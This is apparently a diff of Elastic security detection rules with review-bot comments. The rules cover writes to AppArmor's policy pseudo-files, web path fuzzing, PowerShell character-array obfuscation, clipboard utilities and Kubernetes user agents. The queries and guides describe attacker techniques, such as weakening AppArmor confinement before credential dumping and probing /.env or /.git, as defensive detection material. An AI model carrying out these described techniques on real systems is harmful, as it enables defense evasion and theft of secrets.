An attacker with local code execution may echo a crafted profile into `.replace` or write to `.remove` from a shell script to weaken confinement before dumping credentials or launching a privilege-escalation chain.\n\n### Possible investigation steps\n\n- Determine whether the activity aligns with authorized package installation, configuration management, or AppArmor maintenance by correlating the timestamp with change tickets, software updates, and administrator sessions.\n- Reconstruct the full parent-child execution chain and user context to identify how the write was initiated, whether it came from an interactive shell, script, container entrypoint, or remotely spawned session, and whether elevated privileges were obtained just beforehand.\n- Capture the exact payload or referenced file used in the write attempt and compare it to approved AppArmor profiles to determine whether the action was loading a new profile, weakening an existing one, or removing confinement entirely.\n- Verify the system\u2019s current AppArmor state immediately after the event, including enforcement mode, recently modified or unloaded profiles, and any audit or kernel messages indicating parser errors, profile replacement, or successful policy removal.\n- Investigate adjacent activity from the same user, session, and host for signs of defense evasion or privilege escalation, such as sudo abuse, exploitation traces, disabling other security controls, credential access, or rapid execution of binaries that would normally be confined.\n\n### False positive analysis\n\n- A legitimate system initialization or package maintenance script may use `echo`, `tee`, `cat`, or a shell redirection to load or replace an approved AppArmor profile, so verify the parent process and event timing align with boot activity or an authorized update and that the profile content matches a known file under `/etc/apparmor.d/`.\n- An administrator or deployment script may temporarily reload or remove a profile during 
sanctioned application troubleshooting, so confirm the executing user or service account, the script location and change record, and that the expected AppArmor profile was restored or reloaded immediately afterward.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network and suspend interactive access while preserving the shell history, the script or payload used to write to `/sys/kernel/security/apparmor/.load`, `.replace`, or `.remove`, and any related dropped files for forensic review.\n- Re-enable AppArmor enforcement from trusted administration tooling, compare currently loaded profiles with the approved baseline under `/etc/apparmor.d/`, and remove any unauthorized profile loads, replacements, or profile removals introduced by the attacker.\n- Hunt for and delete persistence established around the same activity, including new or modified `systemd` services, cron jobs, startup scripts, SSH `authorized_keys` entries, `sudoers` changes, and binaries or scripts placed in writable directories.\n- Escalate immediately to incident response if AppArmor protections were successfully weakened or removed, a privileged service profile was altered, root access is suspected, or similar write attempts appear on additional Linux systems.\n- Restore the host to a known-good state from a trusted image or approved configuration backup when system integrity is uncertain, then rotate credentials used on the host and harden access so only authorized administrators and deployment tooling can modify AppArmor policies.\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\") and\n( \n process.name in (\n \"cat\", \"echo\", \"tee\", \"dd\", \"truncate\", \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\",\n \"busybox\", \"awk\", \"sed\", \"xargs\", \"find\", \"grep\", \"node\", \"timeout\", \"env\"\n ) or\n process.name like 
(\".*\", \"python*\", \"perl*\", \"ruby*\", \"lua*\", \"php*\")\n) and\nprocess.command_line like (\n \"*/sys/kernel/security/apparmor/.load*\",\n \"*/sys/kernel/security/apparmor/.replace*\",\n \"*/sys/kernel/security/apparmor/.remove*\"\n)\n", + "references": [ + "https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt", + "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "8293bf1f-8dd0-434e-b52a-1aa6ec101777", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "8293bf1f-8dd0-434e-b52a-1aa6ec101777_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_3.json b/packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_3.json new file mode 100644 index 00000000000..2344abdff5b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8383a8d0-008b-47a5-94e5-496629dc3590_3.json 
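Review bot: The detection keys on `process.command_line like ("*/sys/kernel/security/apparmor/.load*", …)`, so it only observes writes where the pseudo-file path is an argument of the spawned process (for example `tee`, `dd of=`, or `sh -c '… > …'`); an interactive shell redirection is presumably resolved by the shell itself and never appears in any child's command line, yet the `note` cites shell redirection as a source of both true and false positives. A sentence in the `note` stating that coverage is command-line based and that a file-write rule on the same `/sys/kernel/security/apparmor/` paths is the complementary control would set the right expectation for triage and for gap analysis. The `process.name like (".*", "python*", …)` entry also deserves a word in the `description`, since `".*"` here is a glob for dot-prefixed (hidden) process names and a reader may misread it as a regex that matches everything.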
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential web server discovery or fuzzing activity by identifying a high volume of HTTP GET requests resulting in 404 or 403 status codes from a single source IP address within a short timeframe. Such patterns may indicate that an attacker is attempting to discover hidden or unlinked resources on a web server, which can be a precursor to more targeted attacks.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Discovery or Fuzzing Activity", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Discovery or Fuzzing Activity\n\nThis rule flags a single origin generating a rapid burst of GET requests that produce many 404/403 responses, a hallmark of automated web discovery or fuzzing. Attackers commonly run wordlist-driven enumeration to probe paths such as /admin/, /login, /backup.zip, /.env, /.git/, and undocumented API routes, gauging which resources exist and where access controls fail. 
Detecting this reconnaissance early helps prevent subsequent targeted exploitation of newly found endpoints and weak authentication flows.\n\n### Possible investigation steps\n\n- Correlate user-agent, TLS JA3/JA4, Host/SNI, and X-Forwarded-For to fingerprint the client, identify common fuzzing tools or disguised automation, and recover the true origin if traffic traversed a CDN or proxy.\n- Summarize the top requested paths and response codes for this source to spot any 2xx or 401 outcomes amid the denials, flagging hits on sensitive locations such as /.env, /.git, /admin interfaces, backups, installer scripts, and undocumented API routes.\n- Pivot to the same timeframe for adjacent web and authentication activity from this origin to see whether POSTs, credential attempts, or parameterized requests followed the enumeration, indicating progression toward exploitation or spraying.\n- Review WAF/CDN and reverse-proxy logs for blocks, challenges, or rate limiting and whether multiple virtual hosts were targeted via the Host header, confirming if and how far requests reached the application tier.\n- Validate whether the source aligns with approved internal scanners or scheduled testing via inventories and change records, and if not, enrich with ASN/geolocation, reverse DNS, and threat intel to assess reputation and recurrence across your estate.\n\n### False positive analysis\n\n- An internal QA link checker or monitoring crawler run from a single host can request hundreds of unique paths and generate many 404/403 GETs when routes, assets, or permissions are misconfigured.\n- A shared egress IP (NAT or corporate proxy) aggregating many users during a faulty deployment can trigger high volumes of 404/403 GETs as browsers collectively hit moved or newly restricted resources.\n\n### Response and remediation\n\n- Immediately rate-limit or block the offending source IP at the WAF/CDN and reverse proxy, applying a challenge or temporary ban to the observed User-Agent and 
JA3/JA4 fingerprint driving the 500+ unique-path 404/403 GET burst.\n- If traffic came through a proxy or CDN, use X-Forwarded-For to identify and block the true origin, and add a temporary ASN or geolocation block if the source aligns with known scanner networks.\n- Verify whether the source is an approved internal scanner; if not, disable the job or container, remove any scheduled tasks and API keys used, and notify the owner to stop testing against production immediately.\n- Review the requested path list to identify any 2xx or 401 hits and remediate exposures such as accessible /.env, /.git, /admin interfaces, backup archives, or installer scripts by removing files, disabling endpoints, and rotating secrets.\n- Escalate to incident response if enumeration persists after blocking, pivots to POSTs or credential attempts, originates from rotating IPs (Tor/VPN/residential), or produces 2xx on sensitive endpoints despite WAF rules.\n- Harden the web tier by enabling per-IP rate limiting and bot challenges, turning off directory listing and default app endpoints, blocking patterns like /.git/, /.env, and /backup.zip at the WAF, and restricting origin access to CDN egress only.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-*\n| where\n http.request.method == \"GET\" and \n http.response.status_code in (404, 403)\n\n| eval Esql.url_original_to_lower = to_lower(url.original)\n\n| keep\n @timestamp,\n event.dataset,\n http.request.method,\n http.response.status_code,\n source.ip,\n agent.id,\n agent.name,\n Esql.url_original_to_lower,\n data_stream.namespace\n\n| stats\n Esql.event_count = count(),\n Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower),\n Esql.agent_name_values = values(agent.name),\n Esql.agent_id_values = values(agent.id),\n Esql.http_request_method_values = values(http.request.method),\n Esql.http_response_status_code_values = 
values(http.response.status_code),\n Esql.url_original_values = values(Esql.url_original_to_lower),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip\n| where\n Esql.event_count > 500 and Esql.url_original_count_distinct > 250\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^3.0.0" + }, + { + "package": "apache", + "version": "^3.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.0.0" + }, + { + "package": "iis", + "version": "^1.0.0" + }, + { + "package": "traefik", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.agent_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_request_method_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_response_status_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_original_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_original_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "8383a8d0-008b-47a5-94e5-496629dc3590", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + 
"technique": [
+ {
+ "id": "T1595",
+ "name": "Active Scanning",
+ "reference": "https://attack.mitre.org/techniques/T1595/",
+ "subtechnique": [
+ {
+ "id": "T1595.002",
+ "name": "Vulnerability Scanning",
+ "reference": "https://attack.mitre.org/techniques/T1595/002/"
+ },
+ {
+ "id": "T1595.003",
+ "name": "Wordlist Scanning",
+ "reference": "https://attack.mitre.org/techniques/T1595/003/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "esql",
+ "version": 3
+ },
+ "id": "8383a8d0-008b-47a5-94e5-496629dc3590_3",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_6.json b/packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_6.json
deleted file mode 100644
index b8b8f782797..00000000000
--- a/packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_6.json
+++ /dev/null
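Review bot: The query's `http.request.method == \"GET\"` filter leaves HEAD requests uncounted, yet HEAD produces the same 404/403 responses for the same probing and is presumably just as common in automated enumeration, so a HEAD-based run never reaches the `Esql.event_count > 500` threshold; `http.request.method in (\"GET\", \"HEAD\") and ` would close that gap with no other change, since the observed methods are already surfaced in `Esql.http_request_method_values`. The `required_fields` list names only the stats outputs and `source.ip`, while the inputs the query actually reads (`http.request.method`, `http.response.status_code`, `url.original`, `event.dataset`, `agent.id`, `agent.name`, `data_stream.namespace`) are absent, so anything consuming that list will not see the rule's real dependencies; if the list is hand-maintained it should include them. The note itself says traffic commonly traverses a CDN or proxy, but the stats are keyed on `source.ip` alone, so behind such a tier every client collapses into one key and the shared-egress false positive the note describes becomes the default outcome; a sentence in `note` or a `setup` field stating that `source.ip` must carry the true client address (or that the grouping key should be adapted to whatever forwarded-for field the integration populates) would help tuners. The hunk is the whole file.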
@@ -1,173 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use character arrays and runtime string reconstruction as a form of obfuscation. This technique breaks strings into individual characters, often using constructs like char[] with index-based access or joining logic. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Character Array Reconstruction", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Character Array Reconstruction\n\nPowerShell, a powerful scripting language, is often targeted by adversaries for obfuscation to bypass security measures. By reconstructing strings from character arrays, attackers evade static analysis and detection. 
The detection rule identifies scripts using such obfuscation by searching for patterns indicative of character array manipulation, thus flagging potential threats for further investigation.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and intent of the script, focusing on the obfuscated parts indicated by the presence of the \"char\" keyword and the \ud83d\udd25 character.\n- Examine the file.path and host.name fields to determine the origin and location of the script execution, which can provide context about the environment and potential risk.\n- Check the user.id and agent.id fields to identify the user and agent responsible for executing the script, which can help assess whether the activity is expected or suspicious.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and correlate it with other related script blocks, providing a broader view of the script's behavior.\n- Investigate the count field to assess the extent of obfuscation, as a higher count may indicate more complex or extensive obfuscation techniques being used.\n\n### False positive analysis\n\n- Scripts used for legitimate administrative tasks may use character arrays for performance optimization or to handle special characters. Review the script's purpose and context to determine if it aligns with known administrative functions.\n- PowerShell scripts from trusted sources or vendors might use character arrays for legitimate obfuscation to protect intellectual property. Verify the script's origin and check for digital signatures or hashes to confirm authenticity.\n- Automated scripts generated by development tools or frameworks could include character array manipulation as part of their standard output. 
Identify and whitelist these tools if they are commonly used in your environment.\n- Security tools or monitoring solutions might use character arrays in their scripts for legitimate purposes. Cross-reference with known security software and consider excluding these from the detection rule if they are verified as safe.\n- Regularly update the exclusion list to include new trusted scripts or tools as they are introduced into the environment, ensuring that legitimate activities are not flagged as false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of potentially malicious scripts or unauthorized access.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing obfuscation activities.\n- Conduct a thorough review of the script block text and associated logs to identify any malicious payloads or commands executed.\n- Remove any identified malicious scripts or files from the affected system to prevent re-execution.\n- Reset credentials for any user accounts involved in the alert to mitigate potential credential compromise.\n- Update endpoint protection and ensure that AMSI and other security features are fully enabled and configured to detect similar threats.\n- Escalate the incident to the security operations center (SOC) for further analysis and to determine if additional systems are affected.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter for scripts that contain the \"char\" keyword using MATCH, boosts the query performance\n| where powershell.file.script_block_text : \"char\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n 
\"\"\"(char\\[\\]\\]\\(\\d+,\\d+[^)]+|(\\s?\\(\\[char\\]\\d+\\s?\\)\\+){2,})\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - 
"type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "85e2d45e-a3df-4acf-83d3-21805f564ff4", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": 
"https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 6 - }, - "id": "85e2d45e-a3df-4acf-83d3-21805f564ff4_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_7.json b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_7.json deleted file mode 100644 index 752ff8cb014..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_7.json +++ /dev/null 
@@ -1,102 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process group leader. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", - "from": "now-9m", - "history_window_start": "now-7d", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Linux Clipboard Activity Detected", - "new_terms_fields": [ - "host.id", - "process.group_leader.executable" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Linux Clipboard Activity Detected\n\nClipboard utilities on Linux, such as xclip and xsel, facilitate data transfer between applications by storing copied content temporarily. Adversaries exploit this by capturing sensitive data copied by users. The detection rule identifies unusual clipboard activity by monitoring processes that start these utilities, excluding common parent processes, to flag potential misuse. 
This helps in identifying unauthorized data collection attempts.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific process name that triggered the alert, focusing on clipboard utilities like xclip, xsel, wl-clipboard, clipman, or copyq.\n- Examine the parent process of the detected clipboard utility to understand the context of its execution, ensuring it is not a common parent process like bwrap or micro.\n- Investigate the user account associated with the process to determine if the activity aligns with their typical behavior or if it appears suspicious.\n- Check the timing and frequency of the clipboard utility's execution to assess if it coincides with any known user activities or if it suggests automated or unauthorized access.\n- Analyze any related process events or logs around the time of the alert to identify potential data exfiltration attempts or other malicious activities.\n- Consider correlating this alert with other security events or alerts to identify patterns or broader attack campaigns targeting clipboard data.\n\n### False positive analysis\n\n- Frequent use of clipboard utilities by legitimate applications or scripts can trigger false positives. Identify and document these applications to create exceptions in the detection rule.\n- Developers and system administrators often use clipboard utilities in automated scripts. Review and whitelist these scripts to prevent unnecessary alerts.\n- Some desktop environments or window managers may use clipboard utilities as part of their normal operation. Monitor and exclude these processes if they are verified as non-threatening.\n- Regular user activities involving clipboard utilities for productivity tasks can be mistaken for suspicious behavior. 
Educate users on safe practices and adjust the rule to exclude known benign parent processes.\n- Consider the context of the clipboard utility usage, such as time of day or user role, to refine detection criteria and reduce false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent potential data exfiltration or further unauthorized access.\n- Terminate any suspicious processes identified as running clipboard utilities without a common parent process, such as xclip or xsel, to stop potential data capture.\n- Conduct a thorough review of recent clipboard activity logs to identify any sensitive data that may have been captured and assess the potential impact.\n- Change passwords and rotate any credentials that may have been copied to the clipboard recently to mitigate the risk of credential theft.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected.\n- Implement additional monitoring on the affected system to detect any further unauthorized clipboard activity or related suspicious behavior.\n- Review and update endpoint security configurations to ensure that only authorized processes can access clipboard utilities, reducing the risk of future exploitation.", - "query": "event.category:process and host.os.type:\"linux\" and event.type:\"start\" and\nevent.action:(\"exec\" or \"exec_event\" or \"executed\" or \"process_started\") and\nprocess.name:(\"xclip\" or \"xsel\" or \"wl-clipboard\" or \"clipman\" or \"copyq\") and\nnot process.parent.name:(\"bwrap\" or \"micro\")\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "auditd_manager", - "version": "^1.18.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": 
"event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "884e87cc-c67b-4c90-a4ed-e1e24a940c82", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Collection", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1115", - "name": "Clipboard Data", - "reference": "https://attack.mitre.org/techniques/T1115/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 7 - }, - "id": "884e87cc-c67b-4c90-a4ed-e1e24a940c82_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8a1db198-da6f-4500-b985-7fe2457300af_1.json b/packages/security_detection_engine/kibana/security_rule/8a1db198-da6f-4500-b985-7fe2457300af_1.json deleted file mode 100644 index 989c305020a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/8a1db198-da6f-4500-b985-7fe2457300af_1.json +++ /dev/null 
@@ -1,77 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects unusual request responses in Kubernetes audit logs through the use of the \"new_terms\" rule type. In production environments, default API requests are typically made by system components or trusted users, who are expected to have a consistent user agent and allowed response annotations. By monitoring for anomalies in the username and response annotations, this rule helps identify potential unauthorized access or misconfigurations in the Kubernetes environment.", - "history_window_start": "now-10d", - "index": [ - "logs-kubernetes.audit_logs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kubernetes Unusual Decision by User Agent", - "new_terms_fields": [ - "kubernetes.audit.annotations.authorization_k8s_io/decision", - "kubernetes.audit.user.username", - "user_agent.original" - ], - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kubernetes Unusual Decision by User Agent\n\nKubernetes orchestrates containerized applications, relying on API requests for operations. Typically, these requests originate from system components or trusted users with consistent user agents. Adversaries might exploit this by using atypical user agents to mask unauthorized access or misconfigurations. 
The detection rule identifies anomalies in user agents and response annotations, signaling potential threats in the Kubernetes environment.\n\n### Possible investigation steps\n\n- Review the Kubernetes audit logs for entries where the user_agent.original field is present to identify any unusual or unexpected user agents.\n- Cross-reference the identified user agents with known system components and trusted users to determine if the user agent is legitimate or potentially malicious.\n- Examine the kubernetes.audit.stage field for \"ResponseComplete\" entries to understand the context and outcome of the requests associated with the unusual user agent.\n- Investigate the source IP addresses and associated usernames in the audit logs to identify any patterns or anomalies that could indicate unauthorized access.\n- Check for any recent changes or deployments in the Kubernetes environment that might explain the presence of unusual user agents or unexpected behavior.\n- Assess the risk and impact of the detected anomaly by considering the sensitivity of the accessed resources and the permissions associated with the user account involved.\n\n### False positive analysis\n\n- System components or trusted users with legitimate but infrequent user agents may trigger the rule. To manage this, identify these user agents and add them to an exception list to prevent unnecessary alerts.\n- Automated scripts or tools used for maintenance or monitoring might use unique user agents. Regularly review these tools and update the exception list to include their user agents if they are verified as non-threatening.\n- New deployments or updates to Kubernetes components can introduce new user agents temporarily. Monitor these changes and adjust the rule exceptions accordingly to accommodate expected behavior during these periods.\n- Third-party integrations or plugins may use distinct user agents. 
